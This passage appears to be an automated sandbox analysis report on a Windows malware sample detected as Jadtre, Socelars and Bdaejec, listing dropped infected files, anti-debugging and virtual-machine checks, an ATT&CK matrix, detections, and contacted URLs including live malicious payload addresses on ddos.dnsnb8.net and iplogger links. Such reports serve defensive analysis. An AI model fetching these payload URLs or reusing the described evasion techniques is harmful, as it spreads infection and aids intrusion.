Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_6-1074

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

API coverage: 5.5 %

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Code function: 6_2_00AD1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AD1754h

6_2_00AD1718

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Code function: 6_2_00AD29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

6_2_00AD29E2

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Code function: 6_2_00AD2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

6_2_00AD2B8C

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.00000000010EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(#
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000003.1386062037.0000000001138000.00000004.00000020.00020000.00000000.sdmp, 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, 00000004.00000002.1728506028.0000000001131000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361370867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000002.1753575155.000000000138E000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1487485666.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, MDSxhU.exe, 00000006.00000003.1361518674.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

API call chain: ExitProcess graph end node

graph_6-1049

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Code function: 4_2_00BFB926 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00BFB926

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: 4_2_00CCE044 mov eax, dword ptr fs:[00000030h]	4_2_00CCE044
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: 4_2_00C08457 mov eax, dword ptr fs:[00000030h]	4_2_00C08457
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: 4_2_00C12578 mov eax, dword ptr fs:[00000030h]	4_2_00C12578

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: 4_2_00BF4FE5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_00BF4FE5
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: 4_2_00BFB926 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_00BFB926

Source: SciTE.exe.6.dr

Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_00C16803
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: EnumSystemLocalesW,	4_2_00C16AF0
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: EnumSystemLocalesW,	4_2_00C16AA5
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: EnumSystemLocalesW,	4_2_00C0EA37
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: EnumSystemLocalesW,	4_2_00C16B8B
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00C16F8F
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: GetLocaleInfoW,	4_2_00C0EF99
Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00C17164

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Code function: 6_2_00AD1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,

6_2_00AD1718

Source: C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Code function: 4_2_00C12A60 _free,_free,_free,GetTimeZoneInformation,_free,

4_2_00C12A60

Source: C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Code function: 6_2_00AD139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

6_2_00AD139F

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: MDSxhU.exe PID: 2876, type: MEMORYSTR

Yara detected Socelars

Source: Yara match	File source: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe, type: SAMPLE
Source: Yara match	File source: 4.0.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe PID: 3212, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match

File source: Process Memory Space: MDSxhU.exe PID: 2876, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 LSASS Driver	1 LSASS Driver	1 Deobfuscate/Decode Files or Information	11 Input Capture	12 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	3 Obfuscated Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	12 Software Packing	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Process Injection	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	97%	ReversingLabs	Win32.Virus.Jadtre
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	100%	Avira	W32/Jadtre.B
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	100%	Avira	JS/SpyBanker.G2
65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\MDSxhU.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\MDSxhU.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\MDSxhU.exe	92%	ReversingLabs	Win32.Trojan.Madeba

Source	Detection	Scanner	Label
https://www.amazon.com/	0%	URL Reputation	safe
https://iplogger.org/12QMs7	0%	Avira URL Cloud	safe
https://iplogger.org/1Cr3a7	0%	Avira URL Cloud	safe
https://iplogger.org/1TBch7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k4.rarUX	100%	Avira URL Cloud	malware
https://iplogger.org/1fHtp7	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k5.rar86)	100%	Avira URL Cloud	phishing
https://iplogger.org/1E2ma7	0%	Avira URL Cloud	safe
https://sfnice.s3.eu-west-3.amazonaws.com/sfdsf4https://jkcpt.s3.ap-south-1.amazonaws.com/dwqd5https	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	Avira URL Cloud	phishing
https://www.google.com	0%	Avira URL Cloud	safe
